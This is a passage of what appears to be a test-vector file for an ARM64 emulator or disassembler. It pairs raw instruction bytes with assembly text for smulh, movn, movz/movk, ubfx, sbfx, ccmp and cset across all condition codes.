("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x01\x06\xa0\x92", "movn x1, #0x30, lsl #16"),
("\x02\x02\x80\x92", "movn x2, #16"),
("\x63\xa0\x84\x92", "movn x3, #9475"),
("\x64\xa0\x84\x92", "movn x4, #9475"),
("\xe5\x24\x81\x92", "movn x5, #2343"),
("\xa6\xaf\x81\x92", "movn x6, #3453"),
("\x87\x3a\x82\x92", "movn x7, #4564"),
("\xe8\x16\x84\x92", "movn x8, #8375"),
("\xe9\xc1\x84\x92", "movn x9, #9743"),
("\xea\xaa\x82\x92", "movn x10, #5463"),
("\x2b\xf8\x80\x92", "movn x11, #1985"),
("\xc1\xfd\xff\xd2", "movz x1, #0xffee, lsl #48"),
("\x81\xb9\xdb\xf2", "movk x1, #0xddcc, lsl #32"),
("\x41\x75\xb7\xf2", "movk x1, #0xbbaa, lsl #16"),
("\x01\x31\x93\xf2", "movk x1, #0x9988"),
("\x20\x00\x40\xd3", "ubfx x0, x1, #0, #1"),
("\x20\x08\x40\xd3", "ubfx x0, x1, #0, #3"),
("\x20\x0c\x40\xd3", "ubfx x0, x1, #0, #4"),
("\x20\x10\x40\xd3", "ubfx x0, x1, #0, #5"),
("\x20\x78\x40\xd3", "ubfx x0, x1, #0, #31"),
("\x20\xf8\x40\xd3", "ubfx x0, x1, #0, #63"),
("\x20\xfc\x40\xd3", "ubfx x0, x1, #0, #64"),
("\x20\xfc\x41\xd3", "ubfx x0, x1, #1, #63"),
("\x20\xfc\x42\xd3", "ubfx x0, x1, #2, #62"),
("\x20\xfc\x43\xd3", "ubfx x0, x1, #3, #61"),
("\x20\xfc\x60\xd3", "ubfx x0, x1, #32, #32"),
("\x20\x4c\x4a\xd3", "ubfx x0, x1, #10, #10"),
("\xc1\xfd\xff\xd2", "movz x1, #0xffee, lsl #48"),
("\x81\xb9\xdb\xf2", "movk x1, #0xddcc, lsl #32"),
("\x41\x75\xb7\xf2", "movk x1, #0xbbaa, lsl #16"),
("\x01\x31\x93\xf2", "movk x1, #0x9988"),
("\x20\x00\x40\x93", "sbfx x0, x1, #0, #1"),
("\x20\x08\x40\x93", "sbfx x0, x1, #0, #3"),
("\x20\x0c\x40\x93", "sbfx x0, x1, #0, #4"),
("\x20\x10\x40\x93", "sbfx x0, x1, #0, #5"),
("\x20\x78\x40\x93", "sbfx x0, x1, #0, #31"),
("\x20\xf8\x40\x93", "sbfx x0, x1, #0, #63"),
("\x20\xfc\x40\x93", "sbfx x0, x1, #0, #64"),
("\x20\xfc\x41\x93", "sbfx x0, x1, #1, #63"),
("\x20\xfc\x42\x93", "sbfx x0, x1, #2, #62"),
("\x20\xfc\x43\x93", "sbfx x0, x1, #3, #61"),
("\x20\xfc\x60\x93", "sbfx x0, x1, #32, #32"),
("\x20\x4c\x4a\x93", "sbfx x0, x1, #10, #10"),
("\x20\x48\x49\x93", "sbfx x0, x1, #9, #10"),
("\x20\x40\x47\x93", "sbfx x0, x1, #7, #10"),
("\x20\x3c\x47\x93", "sbfx x0, x1, #7, #9"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\x42\xd5\xbd\xd2", "movz x2, #0xeeaa, lsl #16"),
("\x20\x00\x42\xfa", "ccmp x1, x2, 0, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x21\x00\x42\xfa", "ccmp x1, x2, 1, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x22\x00\x42\xfa", "ccmp x1, x2, 2, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x23\x00\x42\xfa", "ccmp x1, x2, 3, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x24\x00\x42\xfa", "ccmp x1, x2, 4, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x25\x00\x42\xfa", "ccmp x1, x2, 5, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x26\x00\x42\xfa", "ccmp x1, x2, 6, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x27\x00\x42\xfa", "ccmp x1, x2, 7, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x28\x00\x42\xfa", "ccmp x1, x2, 8, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x29\x00\x42\xfa", "ccmp x1, x2, 9, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2a\x00\x42\xfa", "ccmp x1, x2, 10, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2b\x00\x42\xfa", "ccmp x1, x2, 11, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2c\x00\x42\xfa", "ccmp x1, x2, 12, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2d\x00\x42\xfa", "ccmp x1, x2, 13, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2e\x00\x42\xfa", "ccmp x1, x2, 14, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2f\x00\x42\xfa", "ccmp x1, x2, 15, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\xc2\xfd\xbf\xd2", "movz x2, #0xffee, lsl #16"),
("\x20\x00\x42\xfa", "ccmp x1, x2, 0, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x21\x00\x42\xfa", "ccmp x1, x2, 1, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x22\x00\x42\xfa", "ccmp x1, x2, 2, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x23\x00\x42\xfa", "ccmp x1, x2, 3, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x24\x00\x42\xfa", "ccmp x1, x2, 4, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x25\x00\x42\xfa", "ccmp x1, x2, 5, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x26\x00\x42\xfa", "ccmp x1, x2, 6, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x27\x00\x42\xfa", "ccmp x1, x2, 7, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x28\x00\x42\xfa", "ccmp x1, x2, 8, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x29\x00\x42\xfa", "ccmp x1, x2, 9, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2a\x00\x42\xfa", "ccmp x1, x2, 10, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2b\x00\x42\xfa", "ccmp x1, x2, 11, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2c\x00\x42\xfa", "ccmp x1, x2, 12, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2d\x00\x42\xfa", "ccmp x1, x2, 13, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2e\x00\x42\xfa", "ccmp x1, x2, 14, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
